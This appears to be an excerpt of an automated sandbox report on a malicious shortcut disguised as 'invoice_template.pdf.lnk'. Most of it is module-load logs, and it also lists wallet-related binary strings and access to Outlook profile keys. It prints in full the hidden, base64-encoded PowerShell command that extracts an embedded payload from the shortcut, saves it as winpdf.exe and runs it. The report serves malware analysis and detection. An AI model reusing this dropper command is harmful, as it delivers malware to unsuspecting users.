        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: textshaping.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: edputil.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: explorerframe.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: windowscodecs.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: thumbcache.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: policymanager.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: msvcp110_win.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: dataexchange.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: d3d11.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: dcomp.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: dxgi.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: twinapi.appcore.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: windows.ui.fileexplorer.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: propsys.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: oleacc.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: assignedaccessruntime.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: xmllite.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: windows.fileexplorer.common.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: linkinfo.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: structuredquery.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: atlthunk.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: windows.storage.search.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: iconcodecservice.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: drprov.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: winsta.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: ntlanman.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: davclnt.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: davhlpr.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: wkscli.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: cscapi.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: twinapi.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: dlnashext.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: playtodevice.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: devdispitemprovider.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: ntshrui.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: actxprxy.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: mmdevapi.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: devobj.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: wpdshext.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: networkexplorer.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: portabledeviceapi.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: msasn1.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: audiodev.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: wmvcore.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: wmasf.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: mfperfhelper.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\explorer.exeSection loaded: aepic.dll
        Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
        Source: C:\Windows\explorer.exeSection loaded: userenv.dll
        Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
        Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
        Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: propsys.dll
        Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
        Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\explorer.exeSection loaded: wininet.dll
        Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
        Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
        Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: wldp.dll
        Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
        Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
        Source: C:\Windows\explorer.exeSection loaded: netutils.dll
        Source: C:\Windows\explorer.exeSection loaded: edgegdi.dll
        Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
        Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
        Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
        Source: C:\Windows\explorer.exeSection loaded: aepic.dll
        Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
        Source: C:\Windows\explorer.exeSection loaded: userenv.dll
        Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
        Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
        Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: propsys.dll
        Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
        Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\explorer.exeSection loaded: wininet.dll
        Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
        Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
        Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: wldp.dll
        Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
        Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
        Source: C:\Windows\explorer.exeSection loaded: netutils.dll
        Source: C:\Windows\explorer.exeSection loaded: edgegdi.dll
        Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
        Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
        Source: C:\Windows\explorer.exeSection loaded: aepic.dll
        Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
        Source: C:\Windows\explorer.exeSection loaded: userenv.dll
        Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
        Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
        Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: propsys.dll
        Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
        Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\explorer.exeSection loaded: wininet.dll
        Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
        Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
        Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: wldp.dll
        Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
        Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
        Source: C:\Windows\explorer.exeSection loaded: netutils.dll
        Source: C:\Windows\explorer.exeSection loaded: edgegdi.dll
        Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
        Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
        Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.fileexplorer.common.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntshrui.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cscapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: invoice_template.pdf.lnkLNK file: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Roaming\fejhsitWindow detected: Number of UI elements: 13
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: invoice_template.pdf.lnkStatic file information: File size 1402376 > 1048576
        Source: Binary string: WalletProxy.pdbGCTL source: explorer.exe, 00000019.00000003.20363166776.0000000004E21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20362445518.0000000004D74000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20330653340.0000000004D98000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20368586190.0000000004D65000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20368948162.0000000004E21000.00000004.00000020.00020000.00000000.sdmp, WalletProxy.dll.25.dr, WalletProxy.dll0.25.dr, WalletProxy.dll1.25.dr, WalletProxy.dll2.25.dr
        Source: Binary string: walletservice.pdbGCTL source: explorer.exe, 00000019.00000003.20366731126.0000000004D65000.00000004.00000020.00020000.00000000.sdmp, WalletService.dll1.25.dr
        Source: Binary string: WalletProxy.pdb source: explorer.exe, 00000019.00000003.20363166776.0000000004E21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20362445518.0000000004D74000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20330653340.0000000004D98000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20368586190.0000000004D65000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20368948162.0000000004E21000.00000004.00000020.00020000.00000000.sdmp, WalletProxy.dll.25.dr, WalletProxy.dll0.25.dr, WalletProxy.dll1.25.dr, WalletProxy.dll2.25.dr
        Source: Binary string: xy.pdb source: explorer.exe, 00000019.00000003.20364678386.0000000004D70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20368586190.0000000004D65000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: Windows.ApplicationModel.Wallet.pdb source: explorer.exe, 00000019.00000003.20331750475.0000000004E32000.00000004.00000020.00020000.00000000.sdmp, Windows.ApplicationModel.Wallet.dll2.25.dr, Windows.ApplicationModel.Wallet.dll1.25.dr, Windows.ApplicationModel.Wallet.dll3.25.dr, Windows.ApplicationModel.Wallet.dll6.25.dr
        Source: Binary string: WalletBackgroundServiceProxy.pdb source: explorer.exe, 00000019.00000003.20361114473.0000000004D74000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20367635324.0000000004E21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20361114473.0000000004D70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20367070090.0000000004D74000.00000004.00000020.00020000.00000000.sdmp, WalletBackgroundServiceProxy.dll.25.dr, WalletBackgroundServiceProxy.dll2.25.dr, WalletBackgroundServiceProxy.dll0.25.dr, WalletBackgroundServiceProxy.dll1.25.dr
        Source: Binary string: WalletBackgroundServiceProxy.pdbGCTL source: explorer.exe, 00000019.00000003.20361114473.0000000004D74000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20367635324.0000000004E21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20367070090.0000000004D74000.00000004.00000020.00020000.00000000.sdmp, WalletBackgroundServiceProxy.dll.25.dr, WalletBackgroundServiceProxy.dll2.25.dr, WalletBackgroundServiceProxy.dll0.25.dr, WalletBackgroundServiceProxy.dll1.25.dr
        Source: Binary string: xy.pdbGCT.r source: explorer.exe, 00000019.00000003.20364678386.0000000004D70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: walletservice.pdb source: explorer.exe, 00000019.00000003.20366731126.0000000004D65000.00000004.00000020.00020000.00000000.sdmp, WalletService.dll1.25.dr
        Source: Binary string: xy.pdbGCT.orp source: explorer.exe, 00000019.00000003.20368586190.0000000004D65000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: Windows.ApplicationModel.Wallet.pdbGCTL source: explorer.exe, 00000019.00000003.20331750475.0000000004E32000.00000004.00000020.00020000.00000000.sdmp, Windows.ApplicationModel.Wallet.dll2.25.dr, Windows.ApplicationModel.Wallet.dll1.25.dr, Windows.ApplicationModel.Wallet.dll3.25.dr, Windows.ApplicationModel.Wallet.dll6.25.dr

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($b64)); invoke-item $env:temp\winpdf.exe@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVers
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA
        Source: WalletBackgroundServiceProxy.dll.25.drStatic PE information: 0x7DA9D8DE [Wed Oct 22 10:11:42 2036 UTC]
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,3_2_004062FC
        Source: winpdf.exe.0.drStatic PE information: real checksum: 0xcff6b should be: 0x10ad6c
        Source: Windows.ApplicationModel.Wallet.dll1.25.drStatic PE information: section name: .didat
        Source: Windows.ApplicationModel.Wallet.dll2.25.drStatic PE information: section name: .didat
        Source: Windows.ApplicationModel.Wallet.dll3.25.drStatic PE information: section name: .didat
